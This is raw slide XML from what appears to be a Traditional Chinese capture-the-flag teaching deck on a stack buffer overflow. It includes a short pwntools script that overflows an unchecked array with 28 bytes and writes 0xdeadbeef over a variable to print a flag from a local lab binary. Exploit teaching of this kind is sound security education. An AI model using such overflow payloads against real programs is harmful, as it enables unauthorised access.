            <a:ext cx="1178510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Rbp-0x4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="直線單箭頭接點 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FDB9753-731F-4C04-A769-B3C53B21C549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8753382" y="4434016"/>
            <a:ext cx="3803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55BA17F7-57D9-4647-B492-E93587E7F20C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9402839" y="4178914"/>
            <a:ext cx="2748490" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目前的值為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 需要把它改為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0xdeadbeef</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文字方塊 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9EAF10C-AA17-4C80-9401-CB464F650F61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8753382" y="2798259"/>
            <a:ext cx="3112230" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x20 - 0x4 = 32 – 4 = 28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>var_20h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>需要填滿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個資料</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177502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7D2EED69-5CC0-4A3B-A57C-7A4946174A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1870947" y="1313036"/>
            <a:ext cx="2178658" cy="3858859"/>
            <a:chOff x="9452479" y="2149702"/>
            <a:chExt cx="2178658" cy="3858859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DF1C11-13C6-4821-BD4E-5763C21CA3DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452480" y="5380408"/>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RETURN ADDRESS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC6F891-A5EA-4E82-91CA-955FA29A0780}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452480" y="4707023"/>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Saved </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
                <a:t>rbp</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7951BF-1ADE-419B-9F0B-05513C4BEBF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452480" y="4219517"/>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var_4h</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019AC418-09E0-4492-B7E2-D3C15379036F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452480" y="2637208"/>
              <a:ext cx="2178657" cy="14994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sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{926E0CD2-5A6A-4146-8D28-7E72D91D1F28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452479" y="2149702"/>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10" name="箭號: 上-下雙向 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79BCF66B-96B4-4BA6-A761-AF4DDD9452F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113016" y="1914761"/>
            <a:ext cx="337351" cy="13857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E8C7FE78-5828-4F7D-B659-5B8D1A6C7A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624774" y="1514064"/>
            <a:ext cx="1857632" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Rbp-0x20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文字方塊 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9259747-59BE-4F55-9709-E8E1130F50AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692437" y="3391032"/>
            <a:ext cx="1178510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Rbp-0x4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="直線單箭頭接點 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33723347-8432-438F-8E18-170E47AF94D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4216893" y="1800542"/>
            <a:ext cx="0" cy="14994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7CD679FE-DA06-4834-BFEE-BCEEB8716A56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412201" y="1914761"/>
            <a:ext cx="6726311" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>陣列使用堆疊，由於沒有檢查邊界，所以將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>陣列蓋掉之後就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直線單箭頭接點 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7CB817-60ED-4565-B1CE-4EA3B7796C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2618913" y="3577701"/>
            <a:ext cx="320483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8E5BC201-DE70-4022-8829-2D77582206FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5823751" y="3429000"/>
            <a:ext cx="5675812" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>填滿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個資料後，將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0xdeadbeef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>塞入這個位置，就可以達成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的條件，列印出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="內容版面配置區 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2854F2AA-EEF4-49B9-B5BC-09C4541FC02D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4" t="70006" r="29626" b="8260"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4216893" y="4349897"/>
            <a:ext cx="6764784" cy="1015841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="內容版面配置區 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{823AC111-4CC5-4273-9117-B1EA092B5B63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4" t="34126" r="29626" b="32003"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4373732" y="217392"/>
            <a:ext cx="6764784" cy="1583150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CAF5637-BA73-4D43-98DE-CB0FFAE4EBFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4373732" y="1597981"/>
            <a:ext cx="2479829" cy="2025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9580623E-B40F-4443-BE2E-54745E37C470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4392968" y="2572737"/>
            <a:ext cx="6726311" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>填滿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3198128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3F8BC6-FD1F-44D9-BD29-3A54500E2986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" cap="none" dirty="0"/>
              <a:t>Exploit code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A5C69A-7B2D-44BB-8D5D-547FBCFA033A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>from pwn import * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>載入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>pwntool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 套件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r = process(‘./pass‘)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>讀取本地端檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>payload = b‘A‘*28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 塞入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個資料 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可替換為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 等等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.sendline(payload + p64(0xdeadbeef))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 填滿位置後將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>位元的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0xdeadbeef </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>塞入至位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.interactive()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1599856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2595B0-F347-4D33-A71D-D72061F202DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行結果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC27C25-E353-4674-8B7D-D22DD1D2C426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="2083003"/>
            <a:ext cx="6458851" cy="2181529"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1731DEB0-55DB-4C5B-9227-7182994A5663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="4394447"/>
            <a:ext cx="6458851" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>本地端執行 由於沒有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案所以沒有列印出來</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3624628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F85BB-17EB-48C9-B15F-8FCA51C861C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Return2code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文字版面配置區 2">
            <a:extLst>
